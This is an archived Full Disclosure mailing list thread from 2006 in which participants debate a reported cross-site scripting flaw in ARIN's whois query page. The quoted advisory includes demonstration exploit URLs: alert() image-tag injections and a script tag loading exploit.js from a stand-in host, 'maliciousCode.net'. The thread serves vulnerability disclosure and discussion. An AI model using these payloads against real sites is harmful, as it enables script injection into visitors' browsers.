Full Disclosure mailing list archives
Re: Arin.net XSS
From: "Steven" <steven () lovebug org>
Date: Fri, 3 Mar 2006 16:28:39 -0500
It works in IE just fine and probably some other browsers. Firefox does a few things: 1) It takes the liberty of converting "<" to %3C 2) Leaves %3C as %3C and does not convert into "<"This prevents the script from being interpreted (in)properly via the Address bar.
Steven----- Original Message ----- From: "Simon Smith" <simon () snosoft com>
To: "Steven" <steven () lovebug org>Cc: "Terminal Entry" <Security () peadro net>; "Full Disclosure" <full-disclosure () lists grok org uk>; "Bug Traq" <bugtraq () securityfocus com>
Sent: Friday, March 03, 2006 4:09 PM Subject: Re: [Full-disclosure] Arin.net XSS
Right, Did this ever work? This fails for me man. How did you verify it? Steven wrote:ok?So what exactly are you going to exploit here? This site doesn't have any logins or even use cookies. Are you going to trick a user into entering in a credit card number before they can search the whois database?I think that XSS in many instances is a serious issues. Many of the XSS issues reported on FD are rarely of much consequence but could theoretically lead to a sessions hijack or tricking the user into a fake login screen. However, in this instance I fail to see what the point could possible be? If it is that you can simply run javascript then so what? Close to 100% of any webhosting provider on the internet will let you upload your own javascript. Might as well report that geocities.com is vulnerable to XSS because you could upload an html file with javascript on it.Anyway.. that's my take on this. Feel free to correct me.. I don't mind. Steven----- Original Message ----- From: Terminal EntryTo: Full Disclosure ; Bug Traq Sent: Thursday, March 02, 2006 11:17 PM Subject: [Full-disclosure] Arin.net XSS TitleARIN.NET input validation holes in "?queryinput=" allows remote users conduct cross-site scripting attacksNotification Multiple attempts to contact Arin site administrators went unanswered Exploit Included: Yes DescriptionThe "?queryinput=" script does not properly validate user-supplied input in several parameters to filter HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser.Some demonstration exploit URLs are provided: http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E Discovered by Terminal Entry security [.at.] peadro (.)net ------------------------------------------------------------------------------This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.------------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Regards, Adriel T. Desautels Harvard Security Group http://www.harvardsecuritygroup.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Arin.net XSS Terminal Entry (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 03)
- Re: Re: Arin.net XSS Alexander Hristov (Mar 03)
- Re: Re: Arin.net XSS J u a n (Mar 03)
- Re: Re: Arin.net XSS Alexander Hristov (Mar 03)
- Re: Arin.net XSS Steven (Mar 03)
- Re: Arin.net XSS Simon Smith (Mar 03)
- Re: Arin.net XSS Steven (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 06)
- RE: Arin.net XSS php0t (Mar 03)
- Re: Arin.net XSS Michael Holstein (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 06)
- Re: Re: Arin.net XSS Paul Farrow (Mar 06)
- Re: Arin.net XSS Simon Smith (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 03)
- <Possible follow-ups>
- RE: Re: Arin.net XSS Terminal Entry (Mar 03)
- Re: Re: Arin.net XSS Dave Korn (Mar 06)
- Re: Re: Arin.net XSS Morning Wood (Mar 06)
- RE: Re: Arin.net XSS Steven Rakick (Mar 03)
- RE: Arin.net XSS Steven Rakick (Mar 03)